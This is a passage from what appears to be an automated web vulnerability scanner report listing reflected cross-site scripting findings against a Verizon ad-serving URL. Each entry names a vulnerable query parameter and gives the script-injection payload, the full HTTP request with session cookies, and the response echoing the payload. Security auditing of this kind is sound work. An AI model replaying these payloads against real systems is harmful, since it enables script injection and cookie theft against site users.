vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=9ed4c"><script>alert(1)</script>d1b86a9b76b&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.462. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [fiosvoice parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the fiosvoice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c30e1"><script>alert(1)</script>dd10f85f830 was submitted in the fiosvoice parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=c30e1"><script>alert(1)</script>dd10f85f830&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:01:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=c30e1"><script>alert(1)</script>dd10f85f830&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.463. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [msp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the msp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9de7e"><script>alert(1)</script>c10c753c345 was submitted in the msp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=9de7e"><script>alert(1)</script>c10c753c345&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:02:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=9de7e"><script>alert(1)</script>c10c753c345&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.464. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6534"><script>alert(1)</script>8fdd1f5d8a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=&a6534"><script>alert(1)</script>8fdd1f5d8a1=1 HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:07:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1400
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1400

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
rtner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=&a6534"><script>alert(1)</script>8fdd1f5d8a1=1" target="_top">
...[SNIP]...

2.465. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [npa parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the npa request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d5f8"><script>alert(1)</script>a944344ff23 was submitted in the npa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=7d5f8"><script>alert(1)</script>a944344ff23&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:02:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1392
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1392

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
g/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=7d5f8"><script>alert(1)</script>a944344ff23&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.466. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [nxx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the nxx request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4810"><script>alert(1)</script>d0104ef1bc2 was submitted in the nxx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=b4810"><script>alert(1)</script>d0104ef1bc2&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:02:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=b4810"><script>alert(1)</script>d0104ef1bc2&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.467. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [online_backup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the online_backup request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1006b"><script>alert(1)</script>28cbd93e024 was submitted in the online_backup parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=1006b"><script>alert(1)</script>28cbd93e024&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:05:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ty=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=1006b"><script>alert(1)</script>28cbd93e024&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.468. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [partner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27185"><script>alert(1)</script>cec5f741ead was submitted in the partner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=27185"><script>alert(1)</script>cec5f741ead&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:01:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=27185"><script>alert(1)</script>cec5f741ead&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" targe
...[SNIP]...

2.469. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [popcity parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the popcity request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5335d"><script>alert(1)</script>aabb8120d05 was submitted in the popcity parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=5335d"><script>alert(1)</script>aabb8120d05&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:59:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3b45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
lick_lx.ads/vzsurround2.net/homepage/L24/946810467/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=5335d"><script>alert(1)</script>aabb8120d05&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&au
...[SNIP]...

2.470. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [popcounty parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the popcounty request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5168b"><script>alert(1)</script>9c08f4ef7f6 was submitted in the popcounty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=5168b"><script>alert(1)</script>9c08f4ef7f6&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:00:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3b45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
age/L24/749513475/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=5168b"><script>alert(1)</script>9c08f4ef7f6&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email
...[SNIP]...

2.471. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [popdma parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the popdma request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f781c"><script>alert(1)</script>a57011b3662 was submitted in the popdma parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=f781c"><script>alert(1)</script>a57011b3662&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
